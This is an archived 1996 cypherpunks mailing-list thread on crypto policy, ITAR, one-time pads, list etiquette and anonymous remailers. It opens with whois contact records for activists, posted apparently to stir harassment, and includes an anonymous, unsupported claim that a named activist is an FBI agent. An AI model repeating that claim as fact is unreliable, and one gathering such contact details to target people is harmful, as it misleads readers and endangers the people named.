Subject: 	evidence from the NIC - interpret and use as you will.

Damn ... if this isn't a smoking gun, I don't know what is!

See who is sleeping with who. These are the supporters of the sham
"hearings".

Voters Telecomm Watch (VTW-DOM)
   115 Pacific St., #3
   Brooklyn, NY 11201

   Domain Name: VTW.ORG

   Administrative Contact:
      Safdar, Shabbir  (SS155)  shabbir@PANIX.COM
      (718) 596-7234
   Technical Contact, Zone Contact:
      Panix Network Information Center  (PANIX5)  hostmaster@panix.com
      +1 212 741 4400

   Record last updated on 27-Sep-95.
   Record created on 06-May-94.

   Domain servers in listed order:

   NS1.ACCESS.NET		198.7.0.1
   NS2.ACCESS.NET		198.7.0.2


The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

Blaze, Matt (CRYPTO-DOM)
   101 Crawford Corners Rd
   Room 4G-634
   Holmdel, NJ 07733

   Domain Name: CRYPTO.COM

   Administrative Contact:
      Blaze, Matt  (MB19)  mab@CRYPTO.COM
      (908) 949-8069
   Technical Contact, Zone Contact:
      Network Information and Support Center  (PSI-NISC)  hostinfo@psi.com
      (518) 283-8860

   Record last updated on 06-May-93.
   Record created on 06-May-93.

   Domain servers in listed order:

   NS.PSI.NET			192.33.4.10
   NS2.PSI.NET			38.8.50.2


The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

Center for Democracy and Technology (CDT2-DOM)
   1634 Eye Street, NW  Suite 1100
   Washington, DC 20006
   USA

   Domain Name: CDT.ORG

   Administrative Contact:
      Weitzner, Daniel  (DW151)  djw@CDT.ORG
      (202) 637-9800
   Technical Contact, Zone Contact:
      Palacios, Bob  (BP282)  bobpal@CDT.ORG
      (202) 637-9800
   Billing Contact:
      Kolb, Danielle  (DK1006)  dkolb@CDT.ORG
      (202) 637-9800

   Record last updated on 19-Apr-96.
   Record created on 20-Dec-94.

   Domain servers in listed order:

   NS.CAIS.COM			205.177.10.10
   NS2.CAIS.COM			199.0.216.1


The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Mon, 22 Jul 1996 18:41:33 +0800
Subject: Re: the VTW---FBI Connection
In-Reply-To: <199607220251.UAA02057@zifi.genetics.utah.edu>
Message-ID: <Pine.GUL.3.94.960721225734.4827A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 21 Jul 1996, Anonymous wrote:

> III) On a tip from a "friend" we learned that the power leader behind VTW
> is a cleancut man with the unusual name "Shabbir M. Safdar." Not exactly
> a common name. Several people say they've met him. Our "friend" says
> that Mr. Safdar is in reality an agent of the FBI.

Damn, he's onto us. Special Agent Allbery, your cover is blown.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfMZNpNcNyVVy0jxAQHqhQH/Vz9uD9rdblqJxDAf77CIoSaS1VCaWulV
vA15PoYuedXJdjEm/+LIxvoSRZbep30XmzDuf+ycFz4YAkW07oDs0Q==
=cnt4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Mon, 22 Jul 1996 14:52:45 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: CDT Policy Post 2.28 - FBI Director to Testify at Senate Crypto Hearing
Message-ID: <199607220314.XAA15879@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



I would disagree with you here jim.  Perhaps you have a selective memory,
but representatives from all the organizations attended the Clipper II
hearings at NIST in Maryland and gave the pro-GAK folks a good drubbing.
(with NIST's microphone too.  They're such good sports...)

Person after person got up at the first of those (and subsequent ones) and
grilled representatives from the FBI, NSA, NIST, and the White House.
The ACLU, EPIC, EFF, CDT, and VTW were all there and pitched in.  Somehow
I don't think that getting grilled is what's missing.  

The thing that's holding us back here is that we're all pretty sold on
our arguments.  When the White House comes to their senses, or Congress
overrules them, or the market makes them irrelevant, then we'll have some
progress.

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace

jim bell writes:
>At 02:12 PM 7/21/96 -0400, Bob Palacios wrote:
>>   The Center for Democracy and Technology  /____/     Volume 2, Number 28
> POLICY POST Volume 2, Number 28                        July 21, 1996
>> CONTENTS: (1) FBI Director to Testify at Senate Crypto Hearing; Netizens Can
>>               Participate in Hearing Live Online
>>In an effort to ensure that concerned Internet users can participate in
>>this important policy debate,
>
>If there is anything worth complaining about, it is that there simply hasn't 
>been a "debate" in this "important policy debate."  The pro-GAK few have 
>consistently avoided appearing in a format in which a genuine debate can 
>occur.  And I don't mean a question-and-answer scenario either, whether the 
>questions are asked by Congress or the news media.  I'm talking about a REAL 
>debate, one where the pro-GAK's can be seen to _lose_ by being torn to pieces.
>
>Jim Bell
>jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 22 Jul 1996 13:49:43 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <v03007803ae188f5668ca@[192.187.162.15]>
Message-ID: <Pine.SUN.3.91.960721230410.23635A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jul 1996, David Sternlight wrote:
> 
> It's not a "monkeys in the British Museum" problem, since when you hit the
> right key sequences both encrypted text streams will fall cleanly
> out--otherwise the chances are overwhelming (given a decently long run)
> that one of the two streams will contain garbles or more likely be complete
> gibberish.

Not with one-time-pads... the key is as long as the plaintext. Our Hamlet 
writing monkeys will produce, amongst others, numerous versions of the 
play where the prince's name is telmaH. As well as vastly more where the 
monkeys get all the way to the last sentence and then 

One-Time-Pads offer perfect security as long as they're only used once. If
they're used more than once, they're not one-time-pads. 

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 22 Jul 1996 17:12:44 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Netscape
In-Reply-To: <31F2F40D.167E@netscape.com>
Message-ID: <Pine.SUN.3.91.960721232033.29477C-100000@crl13.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 21 Jul 1996, Tom Weinstein wrote:

> I agree with you 100%.  Note that while the American Colonists were
> shooting at the British, they didn't take their friends and pin them to
> trees as decoys.

I think the analogy breaks down here.  No one is using anyone
else as a decoy.  Those of us who are activists for strong
crypto, do so of our own free will.  Nobody is forcing us to 
stand up and draw fire.  Anyway, I don't think our cypher-snipers 
are going to stop, just because we ask them to.  So it's a moot 
issue.  If you can't take the heat...


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 18:18:37 +0800
To: Sandy Sandfort <tomw@netscape.com>
Subject: Re: Netscape
In-Reply-To: <31F2DBAE.41C6@netscape.com>
Message-ID: <v03007800ae18d6652564@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:54 PM -0700 7/21/96, Sandy Sandfort wrote:

>Personally, I think it was a good idea for the American Colonists
>to shoot at the British from behind rocks and trees.  As Tom
>pointed out in his post, there are relatively few Cypherpunks.
>We all do what we can, in whatever way best suits are temprament,
>talents and acceptible risk level.  There is no single tao; there
>are many paths.  For Netscape, dialog and negotiations may be the
>best way to promote privacy, for Zimmermann, it was guerilla
>programming, for others it might be high-tech monkey-wrenching.
>To each his own.  As far as I can see, they are all trying to
>bring strong crypto to everyone.

If monkeywrenchers allege that they are trying to "help" us, they are
lying. Netscape is bringing strong crypto to most US people.
Monkeywrenchers are saying 'if everyone can't have it, nobody can' if they
monkey-wrench Netscape's net downloading permission from the government.
Since it's pretty unlikely their monkeywrenching will result in the repeal
of ITAR, they are little different from the spoiled brats who, when told
they can't keep another child's candy, throw it in the dirt and stamp on it
so nobody can have it.

I read Tim May's suggestions, and while he is sincere and trying to be
helpful, I use strong language above because it's time we called things for
what they are instead of politely pussyfooting around them. Monkeywrenchers
are no friends of Cypherpunks. They are the enemy, as surely as is
mandatory key escrow in the US.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 22 Jul 1996 19:36:04 +0800
To: cypherpunks@toad.com
Subject: Re: Info War
Message-ID: <199607220714.AAA10575@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:15 PM 7/20/96 -0400, EVERHART@Arisia.GCE.Com wrote:
>* I'd expect some comments on the automatic running of downloaded images
>and how to secure them. Java? Reported at Princeton to be totally 
>unsecurable....no models exist.

I think a more accurate assessment of what the Princeton people think is
that the state of Java security is much like the state of Unix (pick your
flavor) security when people first started attacking Unix.  Since then it
has been fix the holes as they are found.  Neither has a coherent security
model.

Now the Princeton people can tell us all how I miss-interpreted their position.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 22 Jul 1996 18:21:53 +0800
To: "Deranged Mutant" <cypherpunks@toad.com
Subject: Re: A Snake-Oil FAQ
Message-ID: <199607220731.AAA11388@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:37 PM 7/20/96 +0000, Deranged Mutant wrote:
>The vendor may confuse random session keys or initialization vectors
>with OTPs.

"Random session keys" and "initialization vectors" probably need
definition.  Perhaps a very high level description of an existing "good"
encryption system would do.  Certainly a pointer to such a description
would be valuable.  Here is a start at some definitions:

Random session keys - The practice of generating a new, random key for each
message/communication session etc.  This key needs to be communicated to
the receivers of the message.  This communication can be performed using
public key cryptography or protocols such as Diffie Hellman.

Initialization Vectors - The practice of including some random data at the
start of an encrypted message to make it more secure against certain forms
of cryptanalysis.

A good idea and a good first pass - Bill


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Mon, 22 Jul 1996 13:58:22 +0800
To: "Myers W. Carpenter" <BMCarpenter@trevecca.edu>
Subject: Re: Credit Card to eCash
In-Reply-To: <v03007600ae1866520123@[205.219.251.54]>
Message-ID: <Pine.SUN.3.95.960722020511.22784B-100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain


	Myers:

On Sun, 21 Jul 1996, Myers W. Carpenter wrote:

> 	What would be the problems in setting up a web site to make a
> charge to a Credit Card/ATM card number and return Cash, like an ATM for
> the net?

	Eight to ten years, I think.  It is called money laundering.

	AFAIK, that was the major legal hassle, when it was first 
	done. << OK, so it was on a BBS, not the internet.  >>

	Getting people to use it is the other major problem.
	
        xan

        jonathon
        grafolog@netcom.com


	AOL coasters are unique, and colourful.  
		Collect the entire set. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Jul 1996 11:45:15 +0800
To: cypherpunks@toad.com
Subject: NSA Lawyers Believe ITARs Would be Overturned if Tested in Court
Message-ID: <ae182701000210045a3d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:23 PM 7/21/96, James A. Donald wrote:
>At 03:27 PM 7/20/96 -0700, Tom Weinstein wrote:
>> Why not consider what the consequences will be?  Do you seriously
>> believe that this will make the government stop enforcing ITAR?
>
>Yes:
>
>Widespread politically motivated disobedience forces
>the state to either demonize the disobedient, (as with drug users)
>or give up enforcement.  This is a standard and effective method
>of forcing the repeal of laws, a method which has had a long record
>of success for several hundred years.

Further, I know someone who saw internal NSA memoranda from their legal
folks that court challenges of the ITARs should be avoided if at all
possible, as the ITARs would likely be overturned on constitutional
grounds.

(Not all of them, presumably. Shipment of hardware ("arms") would likely
not be affected. But the ITARs that stop the spread of knowledge, published
papers, and speech (such as speaking where a foreigner can hear!) would
likely be overturned.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 22 Jul 1996 17:19:36 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <v03007800ae18b74ec8da@[192.187.162.15]>
Message-ID: <Pine.SUN.3.91.960722022421.24189A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jul 1996, David Sternlight wrote:
> 
> This is getting silly. 

And here I reach agreement with both you and Perry. 

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 19:27:44 +0800
To: Roger Williams <roger@coelacanth.com>
Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
In-Reply-To: <rogerybkcy92u.fsf@sturgeon.coelacanth.com>
Message-ID: <Pine.LNX.3.93.960722022330.331B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On 22 Jul 1996, Roger Williams wrote:
> >>>>> "CCP" == snow  <snow@smoke.suba.com> writes:
>   >      Am I the only one in this country who, when hearing about TWA
>   > f800 shrugged his shoulders and thought (or said) "Time flies and
>   > aeroplanes crash" (Name the band and album and I'll be impressed)?
> Umm, isn't that "Time flies *but* aeroplanes crash"?

    Don't think so. I'll check in the morning. The wife doesn't like 
British HardCore at 3a.m. Silly girl. 

> Subhumans (the Brits).  12" EP of the same name.  Bluurg records.

     I have it on 29:29 Split Vision. Good stuff. 

> But, yes, my vague impression is that there is more press coverage
> (I get all my news from Auntie Beeb, who hasn't been as vociferous
> about it.)  But to most insular American types, terrorism is still a
> novelty.
> BTW, I wouldn't say that officials discounted terrorism -- you can bet
> Kallstrom is sure hoping that this isn't "just an accident"!

     Thing is, this crash was getting more attention than valuejet from the 
get go. Before there was any HINT of anything more that your typical 
gravity check plane crash it was all over the news.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Mon, 22 Jul 1996 21:37:05 +0800
To: cypherpunks@toad.com
Subject: Special Agent Safdar
Message-ID: <199607220832.CAA03981@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


FBI Special Agent Safdar is upset enough by the revelation
of his true identity to issue a quick denial (on a sunday night, to get
more OT no doubt), but he doesn't even bother to try to refute the 
central truth that his cover has been blown by a careless operator at
his home office who verified his employment and offered to take a message
for him.

We don't have to wonder a second longer about the motives behind
Safdar\VTW\FBI's collection of names of crypto-dissidents, their
support of the Leahy crypto control bill, their refusal to
denounce it even today, their support of the digital telephone
act, the disinformation to make us believe otherwise and all
the other lies. And what about the money?

We must call on the other organizations, like EPIC, EFF, CDT, and ACLU
to denounce the VTW\FBI fraud. Their board of directories, Blaze and
Schneier to face the truth in public that they they have been used.
The net as a whole to demand its pound of cyberflesh.

There are very big questions to be answered now and we must not
forget to keep asking them until they have been. How high did
this operation go? Agent Safdar is no Olly North! He didn't
do this on his own. Who ordered this?

This is exactly like the FBI in the 1960s and civil rights groups.
In the hands of the right reporter, this could and should
bring slick willie right on down.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Mon, 22 Jul 1996 20:23:05 +0800
To: snow <snow@smoke.suba.com>
Subject: [Noise] Re: <rant> Re: Devil's Bargain
In-Reply-To: <Pine.LNX.3.93.960721220053.130P-100000@smoke.suba.com>
Message-ID: <rogerybkcy92u.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "CCP" == snow  <snow@smoke.suba.com> writes:

  >      Am I the only one in this country who, when hearing about TWA
  > f800 shrugged his shoulders and thought (or said) "Time flies and
  > aeroplanes crash" (Name the band and album and I'll be impressed)?

Umm, isn't that "Time flies *but* aeroplanes crash"?

Subhumans (the Brits).  12" EP of the same name.  Bluurg records.

But, yes, my vague impression is that there is more press coverage
(I get all my news from Auntie Beeb, who hasn't been as vociferous
about it.)  But to most insular American types, terrorism is still a
novelty.

BTW, I wouldn't say that officials discounted terrorism -- you can bet
Kallstrom is sure hoping that this isn't "just an accident"!

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Jul 1996 13:45:49 +0800
To: cypherpunks@toad.com
Subject: Boycotts and Etiquette
Message-ID: <ae18344f000210049773@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:19 AM 7/22/96, Igor Chudov @ home wrote:

>Honestly, this boycott campaign looks out of place on Cypherpunks, at
>least to me. I mean, we are for freedom of speech, aren't we?
>Sternlight is talking about on-topic things. How come that renowned
>defenders of freedom of speech resorted to name calling and attempts to
>push their opponent out of the public forum?

Note that I have not called for a boycott of Sternlight. The voices you
here adding their name to a list are biasing the statistics. Those who
don't want to respond to Sternlight, or me, or Vulis, Bell, or VZNuri/LD,
should simply *not respond*! A novel idea, eh?

I think I have been relatively polite to David, though I sure do wish he'd
"pull his punches" with his gratuitous insults (e.g., by ending posts with
dismissive remarks about the moral beliefs of his opponents, to name one
example).

I call these "ad hominem" remarks, in that they call into question the
motivations or the basic competence of others to comment, though perhaps
David believes that since they are "true," they cannot be ad hominem. {It
ain't ad hominem, it's truth.) Perhaps a better word is "disrespectul," in
the sense that I get the impression that David thinks nearly everyone who
engages in argument with him is either childish (a term he characterized my
views as :-}), or foolish, or disingenuous, or oafish, or deceiving, or...

Some examples:

"...so your contention is false on its face."

"Some live in the conversation in their head and require that everything be
spelled out. Very well, then:"

"Isn't that nice. Some creep is proud enough of his skill at accessing the
trivially available InterNIC finger data that he posts it to invoke
harassment. And being a coward as well, he hides behind an anonymous
remailer."

"Another attempt to accuse, read minds, and impute motives."

.....

Actually, I started to go back through the Sternlight CP posts I have saved
(*), and found a curious thing: the intelligent comments vastly outweighed
the "one line repartee" insults! I believe the majority of Net participants
(here, in the crypto newsgroups, etc.) lose sight of the good comments
because of the flamish ones. (* Indeed, I may have skewed my sample toward
less-flamish posts, as I delete most of the simple insult posts.)

I believe David would be better served by not yielding to the temptation to
add throwaway lines, such as he used in replying to me: " Where I come from
we call that "theft". Your ethics may vary in California." This is
unneeded, and adds to a tone of ad hominem attack. It is roughly equivalent
to making snide remarks about the motives of Kallstrom, Denning, Freeh,
etc. Not very persuasive.

In fact, in one analysis of the nature of flaming he noted:

"And when on occasion (as happens) I rise to provocation, my take on it
isn't that the other guy posted "flame bait" but that I allowed myself to
be out of control. It's always possible to respond with the standard
weapons against provocation when such is deliberate: rapier-like wit,
reductio ad absurdum, literate sarcasm, or simple silence aka the filter
file. Actual contumely in a response is seldom necessary, except perhaps by
reference on rare occasion. We're not children here."

Good advice. I agree with him here, and will not try to collect more
examples of rudeness...Perhaps we react too strongly to the
"Sternlightisms" and lose sight of the better points?

Still, in my several years of seeing his posts in sci.crypt,
talk.politics.crypto, talk.politics.org.eff (?), and elsewhere, I've seen
that often his policy points get lost in the clutter of arguing with others
on non-substantive points, of getting pulled into nonsensical crap about
"SternFUD," "Bowdark," the "UnDoctor," and whom he has *Plonk*ed.
Personally, as a neo-Calvinist who believes that those with whom I disagree
on matters of politeness and basic morals are best punished by silence from
me, I have often simply ignored threads that involve this kind of
pettiness.

(But, like David himself said, sometimes I, too, get pulled in...)

There is a spectrum of rudeness and "disrepect." I certainly don't hold
myself up as a standard of politeness. At one end are some truly rude
folks, much ruder than Sternlight, me, or even Perry ("Llywarch Hen" and
Vulis come to mind, recently). At the other end are some truly polite
folks, such as Hal Finney and Bill Stewart, who make their points while
avoiding personal characterizations or cleverly-worded insults.

Rather than wasting list space with talk of "pledges" and boycotts, maybe a
better approach is for us all to concentrate on better posts....

--Tim May

(P.S. I don't intend to pull my punches on the "controversial" posts I like
to write, such as about guns, or Ritalin, or "queer rights." While these
posts apparently are "offensive" to some here, this kind of post is
perfectly "fair game" as I see it.)

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Jul 1996 14:05:55 +0800
To: cypherpunks@toad.com
Subject: Re: A Snake-Oil FAQ
Message-ID: <ae1844310102100452ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:48 PM 7/21/96, David Sternlight wrote:

>So is your comment. What was broken was not public key, but a particular
>key length (and by implication shorter ones). You can do that with just
>about any system, even a one-time pad, by brute force, but it won't buy you
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>much more than sharpening your skills, for longer keys.

This is not correct. The one-time pad is "information-theoretically
secure," as proved early on by Shannon. This is much more than being
"cryptographically secure," for which the term "brute force" is applicable
(albeit essentially still impossible, for a large enough work factor).

(I just looked at later posts and saw your response to Simon Spero's
rebuttal: "Theoretically Simon is right. Nevertheless one-time pads have
been broken
through trial and error when they have been reused either out of laziness
or force majeure." It is _very_ important that people understand that
"reusing a pad" is not a valid use of a _one-time_ pad. Such misuse, while
important in actual cryptanalytic history, is no more a "brute forcing" of
the pad than is buying a key from an opponent, obtaining it through
burglary, etc. All important methods of cracking codes, but not at all what
is meant by "brute force.")

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Jul 1996 14:13:11 +0800
To: cypherpunks@toad.com
Subject: Re: Game Theory and its Relevance to Cypherpunks
Message-ID: <ae18486d030210045199@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Steve Tonnesen <stonnes@ix.netcom.com> is the winner of the 5 point prize,
for his submission to me, the first I received with the correct answer:

At 3:24 AM 7/22/96, Steve Tonnesen wrote:

>>"I have a .45 and a shovel; I doubt you'll be missed." (5 points to
>>whomever first identifies the movie this was in)
>
>"Clueless",  I believe.
>

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Mon, 22 Jul 1996 21:44:07 +0800
To: Mark Terka <werewolf@io.org>
Subject: Re: Does JPUNIX  Remailer Have a Help File?
In-Reply-To: <199607212155.RAA19549@io.org>
Message-ID: <Pine.NEB.3.93.960722053924.20971A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Jul 1996, Mark Terka wrote:

> Anybody know if the nym server at jpunix has a help file that can be
> requested?

Try help@nym.jpunix.com.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Mon, 22 Jul 1996 21:54:52 +0800
To: Damien Lucifer <root@HellSpawn>
Subject: Re: Does JPUNIX Remailer Have a Help File?
In-Reply-To: <Pine.LNX.3.91.890901235226.2684A-100000@HellSpawn>
Message-ID: <Pine.NEB.3.93.960722054017.20971B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1989, Damien Lucifer wrote:

> I beleive the jpunix nym server is running the alpha nym package, the 
> documentation of which should be all but identical to the docs for 
> alpha.c2.org.  You can see that document at http://alpha.c2.org 

This will also work.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 23 Jul 1996 01:47:35 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199607221350.GAA05921@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
